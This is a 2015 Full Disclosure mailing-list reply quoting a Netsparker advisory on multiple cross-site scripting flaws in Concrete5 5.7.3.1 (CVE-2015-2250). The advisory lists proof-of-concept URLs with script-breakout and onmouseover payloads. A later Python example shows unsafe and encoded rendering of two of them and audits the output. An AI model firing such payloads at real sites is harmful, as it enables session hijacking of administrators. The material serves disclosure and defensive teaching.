Message-ID: <CAPKwhwvwZmNDGB16UzRp0mzDzf++rZ9OhmwCyHzDouDLAhzDcg@mail.gmail.com>
Date: Wed, 13 May 2015 23:24:49 -0400
From: Scott Arciszewski <scott@...iszewski.me>
To: Onur Yilmaz <onur@...sparker.com>
Cc: fulldisclosure@...lists.org, cert@...t.org, bugs@...uritytracker.com,
bugtraq@...urityfocus.com, submissions@...ketstormsecurity.org
Subject: Re: [FD] Concrete5 Security Advisory - Multiple XSS Vulnerabilities - CVE-2015-2250
>
> Advisory Timeline
> --------------------
> 05/03/2015 - First Contact
> 06/05/2015 - Vulnerability fixed
> 11/05/2015 - Advisory released
>
I'm honestly surprised it took their team two months to fix this. I've
previously reported issues via HackerOne and they were on it within a day.
If anyone else is thinking about whitehatting up Concrete5, you might get a
faster response if you go through the HackerOne platform. Also, they're
friendly and won't pull a Daniel Kerr move on you if you tell them their
code is Swiss cheese. Speaking from experience here.
On Wed, May 13, 2015 at 10:29 AM, Onur Yilmaz <onur@...sparker.com> wrote:
> Information
> --------------------
> Advisory by Netsparker.
> Name: Multiple XSS Vulnerabilities in Concrete5
> Affected Software : Concrete5
> Affected Versions: 5.7.3.1 and possibly below
> Vendor Homepage : https://www.concrete5.org
> Vulnerability Type : Cross-site Scripting
> Severity : Important
> CVE-ID: CVE-2015-2250
> Netsparker Advisory Reference : NS-15-008
>
> Description
> --------------------
> By exploiting a cross-site scripting vulnerability, the attacker can
> hijack a logged-in user’s session. This means that the malicious
> hacker can change the logged-in user’s password and invalidate the
> session of the victim while the hacker maintains access. As seen from
> the XSS example in this article, if a web application is vulnerable to
> cross-site scripting and the administrator’s session is hijacked, the
> malicious hacker exploiting the vulnerability will have full admin
> privileges on that web application.
>
> Technical Details
> --------------------
> Proof of Concept URLs for cross-site scripting vulnerabilities in
> Concrete5:
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/conversations/bannedwords/success
> Parameter Name: banned_word%5b%5d
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000936)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/reports/logs/view?keywords=&level=&channel='"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>&level[]=600
> Parameter Name: channel
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?peID=1&pdID=3&accessType='"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>
> Parameter Name: accessType
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/multilingual/setup/load_icon
> Parameter Name: msCountry
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D064)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?accessType='"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>&pkCategoryHandle=block_type
> Parameter Name: accessType
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design/submit?ccm_token=1423928022:7f9b7c3cb0f6721bab4a0dec86cefaa3&cID=1&arHandle='"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>
> Parameter Name: arHandle
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>
>
> URL: /concrete5.7.3.1/index.php/dashboard/pages/single
> Parameter Name: pageURL:
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00627A)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design?arHandle='"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>&cID=1
> Parameter Name: arHandle
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>
>
> URL: /concrete5.7.3.1/index.php/dashboard/system/seo/searchindex/updated
> Parameter Name: SEARCH_INDEX_AREA_METHOD
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x00047E)
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/optimization/jobs/job_scheduled
> Parameter Name: unit
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x000C5A)
>
> URL: /concrete5.7.3.1/index.php/dashboard/system/registration/open/1
> Parameter Name: register_notification_email
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x0000DE)
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/extend/connect/"onmouseover="alert(0x00170E)
> Parameter Name: URI-BASED
> Parameter Type: Full URL:
> Attack Pattern: /"onmouseover="alert(0x00170E)
>
> For more information on cross-site scripting vulnerabilities read the
> following article:
>
> https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/
>
> Advisory Timeline
> --------------------
> 05/03/2015 - First Contact
> 06/05/2015 - Vulnerability fixed
> 11/05/2015 - Advisory released
>
> Solution
> --------------------
> Download Concrete5 version 5.7.4, which includes a fix for this vulnerability.
>
> Credits & Authors
> --------------------
> These issues have been discovered by Omar Kurt while testing
> Netsparker Web Application Security Scanner -
> https://www.netsparker.com/web-vulnerability-scanner/
>
> About Netsparker
> --------------------
> Netsparker finds and reports security issues and vulnerabilities such
> as SQL Injection and Cross-site Scripting (XSS) in all websites and
> web applications regardless of the platform and the technology they
> are built on. Netsparker's unique detection and exploitation
> techniques allow it to be dead accurate in reporting, hence it is the
> first and the only False Positive Free web application security
> scanner. For more information visit our website at
> https://www.netsparker.com
>
> --
> Onur Yılmaz - Turkey Manager
>
> Netsparker Web Application Security Scanner
> T: +90 (0)554 873 0482
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
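The advisory's proof-of-concept strings fall into two shapes: one closes a quoted attribute or a style/script block and opens a new `<script>` element, the other only needs to escape a quoted attribute to plant an `onmouseover` handler. The following added example (not Concrete5 code, which is PHP; Python is used so it runs stand-alone) reflects two of those payloads into a constructed template first without encoding and then with context-appropriate encoding, and audits the rendered markup for injected active content. The template, the `render_*` functions and the auditor are all constructed for this illustration.

```python
import html
import json
from html.parser import HTMLParser

# Two payload shapes quoted from the advisory above (constructed sample input).
PAYLOAD_BREAKOUT = "'\"--></style></scRipt><scRipt>alert(0x000936)</scRipt>"
PAYLOAD_ATTR = "'\" onmouseover= alert(0x00047E)"


def render_unsafe(channel: str) -> str:
    """Hypothetical template that reflects a request parameter verbatim into a
    quoted attribute and into a JavaScript string: the pattern the PoCs exploit."""
    return (f'<input name="channel" value="{channel}">'
            f'<script>var ch = "{channel}";</script>')


def render_safe(channel: str) -> str:
    """Same template with encoding chosen per output context."""
    # Quoted HTML attribute: escape & < > " and ' so the value cannot close the quote.
    attr = html.escape(channel, quote=True)
    # JavaScript string: JSON-encode, then break "</" so the script element
    # cannot be terminated early by a reflected </script> tag.
    js = json.dumps(channel).replace("</", "<\\/")
    return f'<input name="channel" value="{attr}"><script>var ch = {js};</script>'


class ActiveContentAuditor(HTMLParser):
    """Counts <script> elements and on* event-handler attributes in rendered markup."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0
        self.handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def audit(markup: str) -> dict:
    """Return how many script elements and event handlers the browser would see.
    The template legitimately contains exactly one script and no handlers."""
    parser = ActiveContentAuditor()
    parser.feed(markup)
    parser.close()
    return {"scripts": parser.scripts, "handlers": parser.handlers}
```

Note that `html.escape` only protects a *quoted* attribute; an unquoted `value=...` would still be broken by the space in the second payload, so quoting the attribute is part of the fix.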